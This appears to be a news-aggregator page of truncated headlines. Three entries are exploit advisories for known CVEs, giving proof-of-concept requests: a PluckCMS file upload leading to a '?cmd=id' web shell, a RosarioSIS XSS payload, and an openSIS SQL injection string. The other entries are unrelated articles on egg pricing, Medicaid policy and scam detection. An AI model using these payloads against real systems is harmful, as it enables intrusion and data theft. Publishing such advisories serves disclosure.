December 3, 2025
Headlines

PluckCMS 4.7.10 – Unrestricted File Upload

Author01 mins

# Exploit Title: PluckCMS 4.7.10 – Unrestricted File Upload # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/pluck-cms/pluck/ # Software Link: https://github.com/pluck-cms/pluck/ # Version: 4.7.10 # Tested on: Windows # CVE : CVE-2020-20969 Proof Of Concept GET /admin.php?action=trash_restoreitem&var1=exploit.php.jpg&var2=file HTTP/1.1 Host: pluck Cookie: PHPSESSID=[valid_session_id] **Access Method:** http://pluck/files/exploit_copy.php?cmd=id **Additional…

Read More

RosarioSIS 6.7.2 – Cross-Site Scripting (XSS)

Author01 mins

# Exploit Title: RosarioSIS 6.7.2 – Cross-Site Scripting (XSS) # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://gitlab.com/francoisjacquet/rosariosis # Software Link: https://gitlab.com/francoisjacquet/rosariosis # Version: 6.7.2 # Tested on: Windows # CVE : CVE-2020-15718 Proof Of Concept http://rosariosis/Modules.php?modname=Scheduling/PrintSchedules.php&search_modfunc=list&include_inactive=” onmouseover=”alert(1)” Steps to Reproduce Log in as an admin user. Send the request. …

Read More

openSIS Community Edition 8.0 – SQL Injection

Author01 mins

# Exploit Title: openSIS Community Edition 8.0 – SQL Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/OS4ED/openSIS-Classic # Software Link: https://github.com/OS4ED/openSIS-Classic # Version: 8.0 # Tested on: Windows # CVE : CVE-2021-40617 Proof Of Concept GET /ForgotPassUserName.php?used_for=username&u=test%27%20OR%20%271%27%3D%271&user_type=student HTTP/1.1 Host: opensis Connection: close Steps to…

Read More

Your Data Might Determine How Much You Pay for Eggs

Author05 mins

If you’re near Rochester, New York, the price for a carton of Target’s Good & Gather eggs is listed as $1.99 on its website. If you’re in Manhattan’s upscale Tribeca neighborhood, that price changes to $2.29. It’s unclear why the prices differ, but a new notice on Target’s website offers a potential hint: “This price…

Read More

Potential “Chilling Effects” of Public Charge and Other Immigration Policies on Medicaid and CHIP Enrollment

Author031 mins

Summary The Department of Homeland Security (DHS) released a proposed rule that would rescind 2022 Biden-era public charge determination regulations. In their place, DHS plans to provide interpretive and policy tools to guide public charge determinations and suggests it will “move away from a bright line primary dependence standard” and remove limitations on the types of public…

Read More

Detect scams using Circle to Search and Google Lens

Author02 mins

One trending tactic among scammers involves sending fraudulent text messages, either directly to your phone or through messaging apps and social media sites. These messages often solicit or demand money and link out to scammy sites. To help you spot these scams, we’ve now added new capabilities to Circle to Search and Lens that will…

Read More